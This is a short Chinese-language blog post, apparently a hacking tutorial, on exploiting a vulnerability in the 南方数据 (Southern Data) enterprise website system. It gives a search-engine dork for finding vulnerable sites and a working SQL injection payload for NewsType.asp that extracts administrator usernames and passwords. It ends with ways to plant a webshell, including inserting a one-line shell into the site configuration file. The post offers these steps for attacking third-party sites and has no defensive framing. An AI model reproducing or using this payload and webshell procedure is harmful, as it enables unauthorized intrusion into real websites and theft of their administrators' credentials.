释放双眼,带上耳机,听听看~!
南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:
NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='
爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp
这里只讲常见的几种,具体还是要看实际过程而定。
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
